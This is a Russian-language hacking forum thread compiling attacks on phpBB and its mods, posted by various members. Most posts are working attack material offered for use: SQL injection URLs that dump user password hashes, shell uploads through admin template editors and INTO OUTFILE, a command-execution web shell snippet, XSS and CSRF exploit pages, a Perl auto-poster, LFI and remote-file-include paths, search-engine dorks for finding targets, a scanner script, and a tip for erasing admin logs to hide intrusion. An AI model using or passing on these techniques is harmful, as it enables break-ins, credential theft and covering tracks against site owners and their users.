Форумы [Обзор уязвимостей phpBB]

Discussion in 'Уязвимости CMS/форумов' started by qBiN, 8 Jan 2006.

  1. doc Gilberg

    doc Gilberg New Member

    Joined:
    27 Jun 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Заливка шелла - eXtreme Styles

    Я еще не видел такого метода заливки шелла, как использование eXtreme Styles
    (*требуется доступ в админку)
    Версии: Точно сказать не могу, но 2.0.21-22 поддерживают
    Метод:
    eXtreme Styles -> Styles Management -> [edit templates]

    После этого можно при помощи встроенного(!) редактора файлов вставить необходимый код в страницу
    Мой любимый файл attach_rules.php
    Им редко кто пользуется, а после заливки туда, можно создать и свой файл


    Подробнее:

    Все просто, если есть доступ к админке и версия использует "eXtreme Styles"
    *я описываю так как есть в доступной мне админке

    Ищешь в левом столбце eXtreme Styles, под ним Styles Management, по этой ссылке кликаешь и в правом фрейме смотришь [edit templates], его кликаешь, и попадаешь в интуитивно понятный редактор файлов в forum_root папке, начинаешь естественно(так как это редактор стилей) в папке templates, выходишь на уровень выше, ищешь нужный файл
    (для дефейса index.php, для заливки шелла, к примеру, attach_rules.php)

    И кликаешь по нему, редактишь его, как надо, т.е. дописываешь в него код шелла(я советую rst-шелл, хоть большой, но качественный, правда АВниками палится)

    Потом давишь кнопку отправить(послать, send и тп.)и выбираешь не ФТП метод, а локалсистем, или как то так... и все, прехеходишь по неообходимой тебе ссылке, и видишь свой(или чужой шелл)
    ___________________________________________
    помог? прибавь к репутации
     
    #21 doc Gilberg, 8 Mar 2008
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  2. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Passive XSS 2.0.22

    1) Пассивная XSS: нефильтруется переменная cur_password при замене пароля


    2) Opencosmo Security
    http://www.opencosmo.com

    Author: Alfredo Panzera, Opencosmo Security
    Vendor: phpBB.com
    Version: 2.0.22

    Exploit:
    Go to http://[website]/forum/admin/admin_groups.php and into 'Group description:' insert your XSS.


    3) PhpBB [profile.php] Permanent Xss Vulnerability
    Sep 20 2007 04:35PM
    Found By Seph1roth

    [POST METHOD]

    Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

    Bugged Variable: "selfdes" (Campo "Altre informazioni")

    Xss: </textarea>[XSS STRING]
     
    #22 ZET36, 8 Mar 2008
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    SQL Injection

    Vulnerable: [phpBB MOD] FileBase

    Exploit:
    Code:
    filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
    Dork:
    Code:
    inurl:"filebase.php" "Powered by phpBB
    SQL Injection

    Vulnerable: Fully Modded phpBB (kb.php)

    Exploit:
    Code:
    kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
    
    Dork:
    Code:
    allinurl :kb.php?mode=article&k
    article&k=
    "Powered by phpBB © 2001, 2006 phpBB Group"  "Modified by Fully Modded phpBB © 2002, 2006"
    
     
    2 people like this.
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    phpBB 2.0.23 Session Hijacking

    Session Hijacking

    Vulnerable: phpBB 2.0.23

    PoC:

    Когда модератор или администратор форума phpBB 2.0.X закрывает тему, его sessionid отправляется GET'ом:

    Code:
    http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]
    Администратор/модератор должен быть перенаправлен на некую тему атакующего.
    Если атакующий разместил в своем посте изображение, то он может видеть referer и тем самым sessionid. И если администратор(модератор) закрывает данную тему, то атакующий получает его sessionid, которую но может использовать для дальнейших атак типа Cross Site Request Forgery

    ============
    Elekt:
    В случае запрета можно заюзать удаленную аватарку ;)
    ============

    [B]Автор: NBBN[/B]
     
    #24 iddqd, 20 Mar 2008
    Last edited by a moderator: 3 Sep 2008
  5. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Заливка шела через темплейты в phpBB3(необходим доступ в админку)

    Заливка шела через темплейты в phpBB3(необходим доступ в админку).

    1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
    2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
    Code:
    <!-- PHP -->
        system($_REQUEST[c]);
    <!-- ENDPHP -->
    
     
    #25 [53x]Shadow, 26 Mar 2008
    Last edited by a moderator: 3 Sep 2008
    6 people like this.
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    phpBB PJIRC mod local file inclusion

    LFI

    Vulnerable: phpBB PJIRC mod

    Vuln script:
    Code:
    ./irc.php:31 include($php_root_path. 'common.' .$phpEx);
    
    PoC:
    Code:
    http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd
    
    © 0in from DaRk-CodeRs
     
    #26 iddqd, 27 Mar 2008
    Last edited: 27 Mar 2008
  7. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    XSS Private Messagging в Phpbb3

    XSS Private Messagging On PhpBB3

    http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page]



    Where is:


    Redirect Code [Ascii --> Hex]:



    COOKIES GRABBER


    © By Dante90 .
     
    #27 Mo4x, 29 Mar 2008
    Last edited: 29 Mar 2008
    2 people like this.
  8. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    PhpBB <= 2.0.22 CSRF Add User In Group


    PhpBB <= 2.0.22 CSRF Add User In Group

    www.hackinginside.altervista.org
    Author: Vincy
    Email: djvincy@hotmail.it

    This CSRF add an user in a group.

    Html Exploit By Vincy:

    HTML:
    <html> 
    <iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe> 
    <form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside"> 
    <input type="hidden" name="username" value="[YOUR_NAME]"> 
    <input type="submit" name="add" value="Add Member"></form> 
    <script>document.vincy.submit()</script> 
    </html> 

    Flash Exploit By Nexen:

    PHP:
    var username:String "[YOUR_NAME]"
    var 
    add:String "Add Member"
    var 
    g:String "[GROUP_ID]"

    getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]""_self""POST");
     
  9. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability


    phpRaider phpbb3 Bridge 'phpbb3.functions.php' Remote File Include Vulnerability

    http://securityfocus.com

    An attacker can exploit this issue via a browser.

    Exploit:

    http://www.example.com/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.example2.com/s.php
     
  10. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    уязвимость в сal_lite

    уязвимость в сal_lite
    Code:
    cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
     
    #30 OptimaPrime, 8 Jun 2008
    Last edited by a moderator: 3 Sep 2008
  11. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    161
    Likes Received:
    47
    Reputations:
    46
    iframe на форум

    Поставить iframe на форум при наличии админки можно вписав код фрейма в название любой темы, желательно видимой для гостей. При небольшой доработке можно и в название раздела, но без знания дела экспериментировать не советую. Тестировалось на phpBB 2.0.22
    Админка -> Форум -> Управление -> Названия тем -> дописываем в конце названия темы фрейм
     
    #31 Светлый, 8 Jul 2008
    Last edited by a moderator: 3 Sep 2008
    4 people like this.
  12. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    phpBB Topic AutoSender

    Code:
    --------------------------------------------------------------- 
     ____            __________         __             ____  __    
    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
     |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\ 
     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
     |___|___|  /\__|  /______  /\___  >__|            |___||__| 
              \/\______|      \/     \/                            
    --------------------------------------------------------------- 
    
    Http://www.inj3ct-it.org       Staff[at]inj3ct-it[dot]org    
    
    -------------------------------------------------------------- 
    
     0day Auto Sender Post phpBB2 
    
    --------------------------------------------------------------- 
    
    # Coded by TuoNuX 
    
    # Description: 
    
    autosendform generator 
    
    --------------------------------------------------------------- 
    
    --------------------------------------------------------------- 
    asf.pl 
    --------------------------------------------------------------- 
    
    #/usr/bin/perl 
    #0day Auto Sender Post phpBB2 
    #TuoNuX@hotmail.it 
    #http://www.localh0st.altervista.org 
    #http://www.hackingz0ne.altervista.org 
    print q { 
    _____________________________________________________________________ 
    
    
     ___           _ _      __  _ 
    |_ _|_ _  ___ | \ | _ _ \ \/  * 0day Auto Sender Post phpBB2 
     | || | |/ . \|   || | | \ \  * TuoNuX@hotmail.it 
     |_|`___|\___/|_\_|`___|_/\_\ * http://www.localh0st.altervista.org 
                   * http://www.hackingz0ne.altervista.org 
     0day Auto Sender Post phpBB2 
    
    
    _____________________________________________________________________ 
    }; 
    print q { 
    [+]Insert host site : 
    [-]Indirizzo: }; 
    $indirizzo = <stdin>; 
    chomp($indirizzo); 
    print q { 
    _____________________________________________________________________ 
    [+]Insert the forum path (for example /phpBB/) : 
    [-]Cartella: }; 
    $cartella = <stdin>; 
    chomp($cartella); 
    print q { 
    _____________________________________________________________________ 
    [+]Insert ID section ( number after "?f=" ): 
    [-]ID Sezione: }; 
    $id = <stdin>; 
    chomp($id); 
    print q { 
    _____________________________________________________________________ 
    [+]Insert Topic Title : 
    [-]Titolo: }; 
    $titolo = <stdin>; 
    chomp($titolo); 
    print q { 
    _____________________________________________________________________ 
    [+]Insert the body topic : 
    [+]Yuc can use also the BB code es: [img]urlimmagine[/img] 
    [-]Testo: }; 
    $testo = <stdin>; 
    chomp($testo); 
    print q { 
    _____________________________________________________________________ 
    [+]Insert the victim sid , don't write everyone if there isn't it : 
    [-]Sid: }; 
    $sid = <stdin>; 
    chomp($sid); 
    $sito = "http://$indirizzo$cartella"; 
    print "\n----------------Riepilogo----------------------\n\n"; 
    print "Forum           =>     $sito\n"; 
    print "ID Section     =>     $id\n"; 
    print "Title          =>     $titolo\n"; 
    print "Message       =>     $testo\n"; 
    print "SID             =>     $sid\n\n"; 
    print "----------------Riepilogo----------------------\n\n"; 
    print "Enter for continued...."; 
    <stdin>; 
    $m1 = q {<html><head><body><form action="}; 
    $m2 = "$sito"; 
    $m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">}; 
    $m4 = "$testo"; 
    $m5 = q {</textarea><input type="hidden" value="}; 
    $m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n"; 
    $m6 = "$titolo"; 
    $m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="}; 
    $m8 = "$id"; 
    $m9 = q {"> <input type="hidden" name="sid" value="}; 
    $m10 = "$sid"; 
    $m11 = q {" /></form><script>document.post.submit()</script></html></head></body>}; 
    $html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11"; 
    open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" ); 
    print FILE $html; 
    close ( FILE ); 
    print q { 
    _____________________________________________________________________
     
  13. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    Залив шела в cache в phpBB

    Обнаружил интересную фишку, которая может помочь при заливке шелла. Иногда бывает что админ выставляет права, которые не позволяют заливать картинки в папку images/avatars попробуем это обойти.

    Всем известен способ заливки шелла от Шанкара через востановление базы данных из админки.

    Напомню создаем файл с содержанием

    Code:
    UPDATE phpbb_config SET config_value=concat('images/avatars/cmd.php',char(0)) WHERE config_name='avatar_path';
    Восстанавливаем базу им базу из админки. И заливаем из зарание открытой страницы профиля новый аватар с содержащимся в нем PHP кодом. Потом идем на _http://www.site.com/forum/images/avatars/cmd.php и юзаем.

    Если папка недоступна на запись попробуем такой финт:
    В phpBB есть папка cache доступная на запись необходимая форуму для работы.
    В ней лежит .htaccess запрещающий доступ извне.

    Делаем файлик:

    Code:
    UPDATE phpbb_config SET config_value=concat('cache/.htaccess',char(0)) WHERE config_name='avatar_path';
    Восстанавливаем им базу. Выставляем в профиле галочку 'удалить текущий аватар' и пытаемся залить некорректный файл.
    Он разумеется не зальется но .htaccess из папки cache магическим способом исчезает.

    А дальше смотри пункт 1 :).
     
    1 person likes this.
  14. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PHP 3 login backdoor

    /////
    Code:
    #!/usr/bin/python
    #This is a phpBB scanner, searches if vulnerable paths
    #exist. Put phpvuln.txt in the dir
    #at which you are running this script.
    #Every path in phpvuln.txt has a vuln. or an exploit for it.
    #(considering its the right version)
    
    #Changelog v1.2 : added update function
    
    #Changelog v1.1 : added verbose mode, changed http 
    #response bug, added new vuln. paths
    
    #http://www.darkc0de.com
    ##d3hydr8[at]gmail[dot]com
    
    import sys, httplib, time, urllib2
    
    def getserv(path):
    
        try:
            h = httplib.HTTP(host+":"+port)
            h.putrequest("HEAD", path)
            h.putheader("Host", host)
            h.endheaders()
            status, reason, headers = h.getreply()
        except: 
            print "\n[-] Error: Name or service not known. Check your host.\n"
            sys.exit(1)
        return status, reason, headers.get("Server")
    
    def timer():
        now = time.localtime(time.time())
        return time.asctime(now)
    
    def title():
        print "\n\t   d3hydr8[at]gmail[dot]com PhpBBscanner v1.2"
        print "\t--------------------------------------------------"
    
    def update():
        try:
            lines = open("phpvuln.txt", "r").readlines()
        except(IOError): 
             print "[-] Error: Check your phpvuln.txt path and permissions"
            print "[-] Update Failed\n"
            sys.exit(1)
        try:
            paths = urllib2.urlopen("http://www.darkc0de.com/scanners/phpvuln.txt").readlines()
        except:
            print "[-] Error: Couldn't connect to remote database"
            print "[-] Update Failed\n"
            sys.exit(1)
        if len(paths) > len(lines):
            dif = int(len(paths)-len(lines))
            print "[+] Found:",dif,"updates"
            print "\n[+] Writing Updates"
            file = open("phpvuln.txt", "a")
            for path in paths[-dif:]:
                if path[-1:] == "\n":
                    path = path[:-1]
                print "[+] New:",path
                file.writelines(path+"\n")
            file.close()
            print "\n[+] Update Complete\n"
        else:
            print "[-] No Updates Available\n"
        sys.exit(1)
    
    if len(sys.argv) >= 5 or len(sys.argv) == 1:
        title()
        print "\n\t[+] Usage: ./phpbbscan.py <host> <port>\n"
        print "\t[options]"
        print "\t   -v/-verbose : Shows all http requests and responses"
        print "\t   -u/-update : Updates phpvuln.txt with the latest"
        print "\n\t[+] Ex. ./phpbbscan.py -update"
        print "\t[+] Ex. ./phpbbscan.py google.com 80 -verbose\n"
        sys.exit(1)
    
    title()
    
    if sys.argv[1].lower() == "-u" or sys.argv[1].lower() == "-update":
        print "\n[+] Updating Database File"
        update()
        
    host = sys.argv[1]
    port = sys.argv[2]
    
    for arg in sys.argv[1:]:
        if arg.lower() == "-v" or arg.lower() == "-verbose":
            verbose = 1
        else:
            verbose = 0
    
    if host[:7] == "http://":
        host = host.replace("http://","")
    if host[-1] == "/":
        host = host[:-1]
        
    print "[+] Getting responses" 
    okresp,reason,server = getserv("/")
    badresp = getserv("/d3hydr8.html")[:1]
    
    if okresp == badresp[0]:
        print "\n[-] Responses matched, try another host.\n"
        sys.exit(1)
    else:
        print "\n[+] Target host:",host
        print "[+] Target port:",port
        print "[+] Target server:",server
        print "[+] Target OK response:",okresp
        print "[+] Target BAD response:",badresp[0], reason
        print "[+] Scan Started at",timer()
        if verbose ==1:
            print "\n[+] Verbose Mode On"
    
    dirs = ["/","/bb/","/phpbb/","/forum/","/forums/","/phpBB2/","/phpbb/phpBB2/"]
    
    try:
        lines = open("phpvuln.txt", "r").readlines()
        print "\n[+]",len(lines)*len(dirs),"paths loaded\n"
    except(IOError): 
         print "[-] Error: Check your vulnerabilities list path\n"
        sys.exit(1)
    
    vulns = []
    print "[+] Scanning...\n" 
    for d in dirs:
        for line in lines:
            status, reason = getserv(d+line[:-1])[:2]
            if verbose ==1:
                print "[+]",status,reason,":",d+line,"\n"
            if status == okresp:
                vulns.append(d+line)
                print "\t[!]",status,reason,":",d+line,"\n"
            if status == int(401):
                print "\t--",status,reason,":Needs Authentication [",d+line,"]\n"
            
    if len(vulns) == 0:
        print "[-] Couldn't find any vuln. paths\n"
    else:
        print "[!] Found",len(vulns),"possible vulnerabilities, check manually.\n"
        for vuln in vulns:
            print "\t[+] ",vuln
    print "\n[+] Scan completed at", timer(),"\n"
    phpBB <= 2.0.16
    XSS :
    " target="_blank">www.ut'
    http://antichat.ru/sniff/log.php


    phpBB <= 2.0.19

    Exploit:
    http://www.milw0rm.com/exploits/1661
    http://www.milw0rm.com/exploits/1661

    phpBB <= 2.0.20


    Exploit: http://www.milw0rm.com/exploits/1780

    phpBB <= 2.0.21

    Exploit: http://www.milw0rm.com/exploits/2348

    Моды


    TopList Hack for PHPBB <= 1.3.8
    Code:
    /toplist.php?f=toplist_top10&phpbb_root_path=shell
    Advanced GuestBook
    Code:
    /admin/addentry.php?phpbb_root_path=shell

    Knowledge Base Mod

    Code:
    /includes/kb_constants.php?module_root_path=shell
    phpBB auction mod
    Code:
    /auction/auction_common.php?phpbb_root_path=shell
    phpRaid <= 3.0.b3

    Code:
    /[phpraidpath]/auth/auth.php?phpbb_root_path=shell
    Code:
    /[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell
    Code:
    /[phpraidpath]/auth/auth.php?smf_root_path=shell
    Code:
    /[phpraidpath]/auth/auth_SMF/smf_root_path=shell
    PafileDB
    Code:
    /[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell
    Foing <= 0.7.0
    Code:
    /index.php?phpbb_root_path=shell
    Code:
    /song.php?phpbb_root_path=shell
    Code:
    /faq.php?phpbb_root_path=shell
    Code:
    /list.php?phpbb_root_path=shell
    Code:
    /gen_m3u.php?phpbb_root_path=shell
    Code:
    /playlist.php?phpbb_root_path=shell
    Activity MOD Plus
    Code:
    /language/lang_english/lang_activity.php?phpbb_root_path=shell
    Blend Portal <= 1.2.0
    Code:
    /blend_data/blend_common.php?phpbb_root_path=shell
    Minerva <= 2.0.8a
    Code:
    /stat_modules/users_age/module.php?phpbb_root_path=shell

    Minerva <= v238

    Code:
    /admin/admin_topic_action_logging.php?setmodules=attach&p hpbb_root_path=shell
    FlashBB <= 1.1.5
    Code:
    /phpbb/getmsg.php?phpbb_root_path=shell
    HoRCMS <= 1.3.1
    Code:
    /includes/functions_cms.php?phpbb_root_path=shell
    mail2forum <= 1.2

    Code:
    /m2f/m2f_forum.php?m2f_root_path=shell
    Code:
    /m2f/m2f_phpbb204.php?m2f_root_path=shell
    Code:
    /m2f/m2f_forum.php?m2f_root_path=shell
    Code:
    /m2f/m2f_mailinglist.php?m2f_root_path=shell
    Code:
    /m2f/m2f_cron.php?m2f_root_path=shell
    WoW Roster
    Code:
    /[roster_path]/lib/phpbb.php?subdir=shell
    Integramod Portal

    Code:
    /includes/functions_mod_user.php?phpbb_root_path=shell
    Code:
    /includes/functions.php?phpbb_root_path=shell
    Shadow Premod <= 2.7.1
    Code:
    /includes/functions_portal.php?phpbb_root_path=shell
    phpBB XS <= 0.58
    Code:
    /includes/functions_kb.php?phpbb_root_path=shell
    Code:
    /includes/bbcb_mg.php?phpbb_root_path=shell
    Code:
    /includes/functions.php?phpbb_root_path=shell
    pnphpbb
    Code:
    /includes/functions_admin.php?phpbb_root_path=shell
    Admin Topic Action Logging
    Code:
    /admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=
    phpBB Static Topics <= 1.0
    Code:
    /includes/functions_static_topics.php?phpbb_root_path=shell

    Security Suite IP Logger

    Code:
    /includes/logger_engine.php?phpbb_root_path=shell
    Dimension of phpBB
    Code:
    /includes/themen_portal_mitte.php?phpbb_root_path=shell
    Code:
    /includes/logger_engine.php?phpbb_root_path=shell
    Code:
    /includes/functions.php?phpbb_root_path=shell
    phpBB User Viewed Posts Tracker
    Code:
    /includes/functions_user_viewed_posts.php?phpbb_root_path=shell
    phpBB RANDOm USER REGISTRATION NUMBER
    Code:
    /includes/functions_num_image.php?phpbb_root_path=shell
    phpBB insert user <= 0.1.2
    Code:
    /includes/functions_mod_user.php?phpbb_root_path=shell

    phpBB Import Tools Mod <= 0.1.4

    Code:
    /includes/functions_mod_user.php?phpbb_root_path=shell
    phpBB Ajax Shoutbox <= 0.0.5
    Code:
    /shoutbox.php?phpbb_root_path=shell

    SpamBlockerMOD <= 1.0.2

    Code:
    /root/includes/antispam.php?phpbb_root_path=shell
    phpBB PlusXL 2.x <= biuld 272
    Code:
    /mods/iai/includes/constants.php?phpbb_root_path=shell
    AMAZONIA MOD
    Code:
    /zufallscodepart.php?phpbb_root_path=shell
    news defilante horizontale <= 4.1.1
    Code:
    /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=shell
    phpBB lat2cyr <= 1.0.1
    Code:
    /lat2cyr.php?phpbb_root_path=shell

    SpamOborona PHPBB Plugin

    Code:
    /admin/admin_spam.php?phpbb_root_path=shell
    
    RPG Events 1.0.0
    Code:
    /functions_rpg_events.php?phpbb_root_path=shell
    phpBB archive for search engines
    Code:
    /includes/archive/archive_topic.php?phpbb_root_path=shell
    PhpBB Prillian French

    Code:
    /language/lang_french/lang_prillian_faq.php?phpbb_root_path=shell
    phpBB ACP User Registration Mod 1.00
    Code:
    /includes/functions_mod_user.php?phpbb_root_path=shell

    phpBB Security <= 1.0.1

    Code:
    /phpbb_security.php?phpbb_root_path=shell
    phpBBFM version 206-3-3
    Code:
    /language/lang_english/lang_prillian_faq.php?phpbb_root_path=shell


    Fully Modded phpBB 2


    Code:
    /faq.php?foing_root_path=shell
    Code:
    /index.php?foing_root_path=shell
    Code:
    /list.php?foing_root_path=shell
    Code:
    /login.php?foing_root_path=shell
    Code:
    /playlist.php?foing_root_path=shell
    Code:
    /song.php?foing_root_path=shell
    Code:
    /view_artist.php?foing_root_path=shell
    Code:
    /view_song.php?foing_root_path=shell
    Code:
    /login.php?foing_root_path=shell
    Code:
    /playlist.php?foing_root_path=shell
    Code:
    /song.php?foing_root_path=shell
    Code:
    /flash/set_na.php?foing_root_path=shell
    Code:
    /flash/initialise.php?foing_root_path=shell
    Code:
    /flash/get_song.php?foing_root_path=shell
    Code:
    /includes/common.php?foing_root_path=shell
    Code:
    /admin/nav.php?foing_root_path=shell
    Code:
    /admin/main.php?foing_root_path=shell
    Code:
    /admin/list_artists.php?foing_root_path=shell
    Code:
    /admin/index.php?foing_root_path=shell
    Code:
    /admin/genres.php?foing_root_path=shell
    Code:
    /admin/edit_artist.php?foing_root_path=shell
    Code:
    /admin/edit_album.php?foing_root_path=shell
    Code:
    /admin/config.php?foing_root_path=shell
    Code:
    /admin/admin_status.php?foing_root_path=shell

    DORK'S


    Code:
    Powered by phpBB 2
    
    "Powered by phpBB"
    Powered by phpBB
    
    ext: php intext:"phpbb_installed"
    
    "Powered by phpBB * 2002, 2006 phpBB Group" -demo
    
    "2002, 2006 phpBB Group"
    "phpBB Group"
    phpbb 2
    
    intext:"Powered by phpBB 2.0."
    
    inurl:"index.php?sid="
    inurl:"kb.php?mode=cat"
    inurl:"templates""http://forum.xaknet.ru/images/" logo_phpBB.gif
    inurl:/phpbb2/
    inurl:/phpbb/
    Code:
    +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
    intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"
    intext:"Powered by phpBB 2.0." inurl:"kb.php?mode=cat"
    Code:
    "Powered by phpBB" "2001, 2005 phpBB Group" inurl:index.php inurl:sid=
    inurl:/install.php Welcome to phpBB
    intext:"Powered by phpBB 2.0" -site:phpbb.com
    intext:"Powered by phpBB 2.0" -site:phpbb.com -"2.0.11"
    intitle:"Welcome.to.phpbb.*.installation"
    filetype:php inurl:phpbb2 intext:Index -intext:2.0.13 -intext:2005
    +intext:"* by phpBB ©"
    "powered b" "y phpbb"
    inurl:redirect=admin/index.php "Powered by phpBB"
    inurl:admin/index.php "Powered" "phpBB"
    Code:
    "Powered by phpbb modified v1.8 by Przemo"
    "Powered by" "v1.8 by Przemo"
    "Powered by" "v1.8 by Przemo" -edu -demo -shoutbox
    "Powered by" "v1.8 by Przemo" inurl:index.php -edu -demo -shoutbox 
    "powered by PhpBB 2.0.15" -site:phpbb.com

    (c)Взято с h4ckyou.org
     
    #34 OptimaPrime, 3 Sep 2008
    Last edited by a moderator: 4 Sep 2008
    1 person likes this.
  15. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    небольшое дополнение способ загрузки файла через Sql
    Многим известен способ заливки шелла через восстановление бд(sql запрос) .
    В данном случае надо
    1) Иметь file_priv=y
    2)Знать пути
    3)Знать таблицу(скорее префикс)
    3-ий пункт незачем, знать таблицу(префикс) не обязательно
    Также создаем Sql файл
    один вариант
    Code:
    SELECT '<? system(id); ?>' INTO OUTFILE '/home/lol/htdocs/forum/evil.php';
    И он будет работать!
    другой вариант
    Code:
    select '<? system(id); ?>' into outfile '/home/lol/htdocs/forum/evil.php' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '';
    тоже вариант, после выполнения создастся файл evil.php.
    Тож канает
     
    #35 ImpLex, 16 Dec 2008
    Last edited: 16 Dec 2008
    2 people like this.
  16. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Заливка шелла в phpBB 3

    не нашел на форуме способов заливки шелла в phpBB 3 версии.
    1) Вкладка общие --> Безопасность
    Разрешить php в шаблонах: Да
    2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
    С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
    Code:
    <!-- PHP -->
    
    phpinfo();
    
    <!-- ENDPHP -->
    
    
    Далее применяем шаблон, идем на измененную страницу и видим наш php код
     
    magnathorax, Светлый and c411k like this.
  17. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    удаление лога администратора

    все работает отлично, спасибо тебе и разработчикам phpbb3, очень облегчили жизнь! :p

    после таких манипуляций в админке phpbb3 отсается палево - айпишний и логин админа, который "тыкал кнопочки".. даже после ручного удаления изменений, все равно последнее выглядит "admin ... Очищен лог администратора ... date ... ip"

    через sql тулзу удаляем свои следы в таблице phpbb_log + после логаута не забываем проапдейтить дату последнего визита на прежнюю. значение находится в табле phpbb_users, колонка user_lastvisit.
     
    _________________________
    4 people like this.
  18. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Отключённой в смысле? В Списке нету?..
    Попробуй обраиться к срипту напрямую
    Code:
    admin_db_utilities.php?perform=restore&sid=сессия
    Просто..встречал пару раз модифиц phpbb..Где в админке не было такого пункта.....но скрипт был)
     
  19. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    phpBB3 addon prime_quick_style GetAdmin Vulnerability

    ##########################################################################
    #
    # phpBB3 addon prime_quick_style GetAdmin Exploit
    #
    # Vulnerability found and exploited by -SmoG-
    #
    # target file: prime_quick_style.php
    #
    #
    # vuln: POST parameter "prime_quick_style" is injectable.
    # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
    #
    # HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
    # example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
    #
    # query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
    #
    # gratz, now u will be an admin :)
    #
    # --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
    #
    #
    # -( by -SmoG- )-
    ##########################################################################

    # milw0rm.com [2009-09-01]
     
  20. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Уязвимость: E-Mail send XSRF (CSRF) Vulnerability.
    Описание: Собственно, работает лишь в phpbb2, в 3 версии уже закрыта.
    Эксплойт:
    Code:
    <html>
    <body>
    <form action="http://victim.com/phpbb2/profile.php?mode=email&amp;u=userid" method="post">
